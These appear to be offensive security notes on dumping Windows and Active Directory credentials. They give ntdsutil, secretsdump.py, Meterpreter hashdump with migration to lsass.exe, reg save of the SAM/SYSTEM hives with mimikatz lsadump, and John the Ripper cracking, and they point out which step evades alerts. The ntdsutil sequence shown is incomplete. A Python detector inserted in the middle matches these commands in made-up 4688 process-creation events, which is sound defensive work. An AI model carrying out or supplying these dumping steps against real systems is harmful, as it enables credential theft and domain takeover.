*After obtaining Admin access*
The tool of choice is built into Windows: ntdsutil, an Active Directory Domain Services management tool designed to manage AD data.
To gather NTDS.dit and the SYSTEM registry hive data, run the following:
ntdsutil
activate instance ntds (this will generate a backup of the C:\ntds directory)
ifm
This is less likely to trigger an alert
After retrieving this data, it will need to be decrypted. A tool that can be used for this process is called secretsdump.py (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
Command: secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL
Obtaining Windows 10 password hashes
There are two options for obtaining the local hashes from a Windows box:
- Password hashes from memory using meterpreter hashdump command
- Mimikatz
Hashdump
Hashdump will fail with the priv_passwd_get_sam_hashes error.
To work around this problem, we just have to move to a different process: migrate from the current process to lsass.exe.
In newer shells you can combine the ps and migrate steps with the following command: migrate -N lsass.exe
If successful, rerun hashdump.
Mimikatz
Retrieve the contents of HKLM\sam and HKLM\system, then make them available to mimikatz:
reg save hklm\sam sam.hiv && reg save hklm\system system.hiv
c:\tools\mimikatz\x64\mimikatz.exe "lsadump::sam /sam:sam.hiv /system:system.hiv"
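Each of the steps above (ntdsutil, reg save of the SAM/SYSTEM hives, mimikatz lsadump) is a process creation that a domain controller or workstation logs as Security event 4688 when command-line auditing is enabled. The following detector is an added example for this page, not part of the original notes or of any of the tools mentioned: it runs a few rules over constructed 4688-style records (the field names follow the 4688 schema, the values are made up) and returns the user, process and rule for every hit. One caveat it encodes: when ntdsutil is used interactively as shown, the subcommands typed at its prompt never appear in the 4688 command line, so the executable itself is the signal and an admin's own scheduled use of it is the noise to tune out.

```python
import re

# Constructed sample records shaped like Windows Security event 4688
# (process creation with command-line auditing enabled). Field names
# follow the 4688 event schema; the values are made up for this example.
SAMPLE_EVENTS = [
    {"SubjectUserName": "da-admin", "NewProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": "ntdsutil"},   # interactive session: subcommands are not logged
    {"SubjectUserName": "da-admin", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam sam.hiv"},
    {"SubjectUserName": "da-admin", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system system.hiv"},
    {"SubjectUserName": "da-admin", "NewProcessName": r"C:\tools\mimikatz\x64\mimikatz.exe",
     "CommandLine": r'c:\tools\mimikatz\x64\mimikatz.exe "lsadump::sam /sam:sam.hiv"'},
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\Microsoft\Windows\CurrentVersion\Run"},
    {"SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
]

# Each rule: (name, severity, process-name pattern, command-line pattern).
# None means "any". Matching is case-insensitive because Windows paths
# and reg.exe arguments are case-insensitive.
RULES = [
    ("ntdsutil_started", "medium", re.compile(r"\\ntdsutil\.exe$", re.I), None),
    ("ntdsutil_ifm_export", "high", re.compile(r"\\ntdsutil\.exe$", re.I),
     re.compile(r"\bifm\b", re.I)),
    ("reg_save_sam_or_system_hive", "high", re.compile(r"\\reg\.exe$", re.I),
     re.compile(r"\bsave\s+hklm\\(sam|system)\b", re.I)),
    ("mimikatz_lsadump", "high", None, re.compile(r"lsadump::", re.I)),
]


def match_rules(event):
    """Return the names of every rule the event satisfies, in RULES order."""
    hits = []
    for name, _severity, proc_re, cmd_re in RULES:
        if proc_re and not proc_re.search(event.get("NewProcessName", "")):
            continue
        if cmd_re and not cmd_re.search(event.get("CommandLine", "")):
            continue
        hits.append(name)
    return hits


def scan(events):
    """Return (user, process, rule, severity) for every matching event."""
    severity_of = {name: sev for name, sev, _, _ in RULES}
    findings = []
    for ev in events:
        for rule in match_rules(ev):
            findings.append((ev["SubjectUserName"], ev["NewProcessName"],
                             rule, severity_of[rule]))
    return findings


if __name__ == "__main__":
    for user, proc, rule, severity in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {user} ran {proc}")
```

Run against the constructed records, the scan yields four findings, all for da-admin, and nothing for the ordinary reg query or explorer.exe launches; the ntdsutil record only reaches the medium-severity rule because its logged command line carries no ifm argument.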
John the Ripper
Cracking windows passwords with John
You will need to give John the text-based output from Meterpreter's hashdump module, mimikatz, or secretsdump.py.
Merging the /etc/passwd and /etc/shadow files:
unshadow /etc/passwd /etc/shadow > combined
For Windows NT targets, you must specify --format=NT
For LANMAN targets, you must specify --format=LANMAN